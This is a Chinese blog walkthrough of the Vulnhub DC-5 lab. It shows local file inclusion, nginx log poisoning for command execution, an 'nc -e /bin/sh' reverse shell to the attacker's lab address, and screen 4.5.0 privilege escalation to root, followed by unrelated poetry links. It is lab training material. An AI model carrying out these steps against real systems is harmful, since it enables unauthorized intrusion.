Vulnhub靶场----5、DC-5
创始人
2024-06-03 20:29:50
0

文章目录

  • 一、环境搭建
  • 二、渗透流程

一、环境搭建

DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip
kali:192.168.144.148
DC-5:192.168.144.153

二、渗透流程

1、信息收集 
nmap -T5 -p- -sV -sT -A 192.168.144.15

思路:
开放端口是80、36888
访问web页面:
网站指纹探测、查看页面内容、目录枚举、网页源代码信息泄露;
……

2、探测网站内容

1.访问http://192.168.144.153,点击contact页面

2.burpsuite抓取请求包

3.路径存在文件包含

3、文件包含利用 获取权限

1.利用文件包含写入一句话木马


2.利用文件包含使上传的文件以PHP格式执行
用户输入数据,Nginx日志会记录用户输入,将木马或者命令写入Nginx日志,利用文件包含日志,就可以将用户输入以PHP格式执行

file=/var/log/nginx/error.log&cmd=ls


3.nc 反弹shell

file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.144.148 4444


4.使用python生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'
4、提权

1.查找以root权限运行的组件

find / -perm -4000  2>/dev/null


2.寻找screen 4.5.0相关漏洞

searchsploit screen 4.5.0


3.漏洞利用

将漏洞利用脚本复制到当前目录

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

将如下内容写入libhax.c中,然后gcc编译:

vim libhax.c 
gcc -fPIC -shared -ldl -o libhax.so libhax.c

将如下内容写入rootshell.c中,然后gcc编译

vim rootshell.c
gcc -o rootshell rootshell.c

将如下内容写入dc5.sh

vim dc5.sh


4.获取root权限

将刚刚生成的文件通过蚁剑上传到/tmp目录

cd /tmp
chmod +x dc5.sh
ls -l
./dc5.sh
cd /root
词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:聚焦证券行业数据安全,全场景方案助力能力提升

下一篇:我们决定随机选个区域直接送钱!!!

相关内容

热门资讯

《读唐诗》歌词 《读唐诗》歌词  《读唐诗》,由魏德泮作词,谷建芬监制、作曲,张宏光编曲,收录于《新学堂歌》、《20...
陶渊明的田园诗   陶渊明的田园诗  1、《饮酒·其五》  结庐在人境,而无车马喧。  问君何能尔,心远地自偏。  ...
初入淮河四绝句 杨万里 初入淮河四绝句 杨万里  《初入淮河四绝句》是宋代诗人杨万里的组诗作品,运动了借景抒情的手法,表达对...
关于春节贴对联的古诗 关于春节贴对联的古诗  古诗的特点  古体诗是与近体诗相对而言的诗体。近体诗形成前,各种汉族诗歌体裁...
清明古诗句 清明古诗句  导语:清明节,雨纷纷,长亭古道草青青;微风过,燕子斜,天地悠悠飘精灵。种子发新芽,红泥...
汪曾祺的散文 汪曾祺的散文(精选13篇)  在我们平凡的日常里,大家或多或少都接触过散文吧?散文对作者主观感情的要...
于立春时节古诗赏析 俗语常说,一年之计在于春。作为二十四节气中的第一个节气,立春与立夏、立秋、立冬一样,反映着四季的更替...
唐朝大才女“上官婉儿”的诗句 唐朝大才女“上官婉儿”的诗句  长得仰昭回,香园万乘来, 【奉和圣制立春日侍宴内殿出翦彩花应制】 密...
今年海角天涯萧萧两鬓生华 “今年海角天涯。萧萧两鬓生华。”出处 出自 宋代 李清照 的《清平乐·年年雪里》“今年海角天涯。萧萧...
诗词鉴赏秦观如梦令 诗词鉴赏秦观如梦令  《如梦令·遥夜沉沉如水》  年代: 宋 作者: 秦观  遥夜沉沉如水,  风紧...
李商隐《字略》真伪考辨论文 李商隐《字略》真伪考辨论文  【内容提要】  唐代诗人李商隐著有古文集字书《字略》。由于原书已经失传...
鹧鸪天苏轼 鹧鸪天苏轼  《鹧鸪天·林断山明竹隐墙》是宋代诗人苏轼的作品,表达了诗人心情悲凉,产生了随遇而安的思...
幼儿园毕业诗朗诵串词   幼儿园毕业诗朗诵串词  尊敬的各位领导、家长、亲爱的老师、小朋友们:  大家下午好!  童年是一...
《江上渔者》翻译及赏析 《江上渔者》翻译及赏析  《江上渔者》是范仲淹的一首五言绝句。我们为大家整理了《江上渔者》翻译及赏析...
劝学的古诗句 关于劝学的古诗句  劝人多多学习,在古代就已经是非常的“流行”。下面小编给大家整理了关于劝学的古诗句...
描写春天的诗句鉴赏 描写春天的诗句鉴赏  年年春日异乡悲,杜曲黄莺可得知。你知道描写春天的诗句有哪些吗?以下是小编为大家...
时光的诗句 关于时光的诗句  尘归尘,土归土,时光流逝,生命轮回,从哪里来到哪里去,何必如此?以下是关于时光的诗...
描写下雪了的诗句 有关描写下雪了的诗句  云横秦岭家何在,雪拥蓝关马不前。那么还有哪些是描写下雪了的诗句呢?以下是小编...
描写月亮的诗句 描写月亮的诗句  一、什么是诗句  诗句,读作:shī jù 就是组成诗词的句子。诗句通常按照诗文的...
以描写雪中梅花为主题的诗句 以描写雪中梅花为主题的诗句  1、雪似梅花,梅花似雪,似和不似都奇绝 宋·吕本中《踏莎行》  2、来...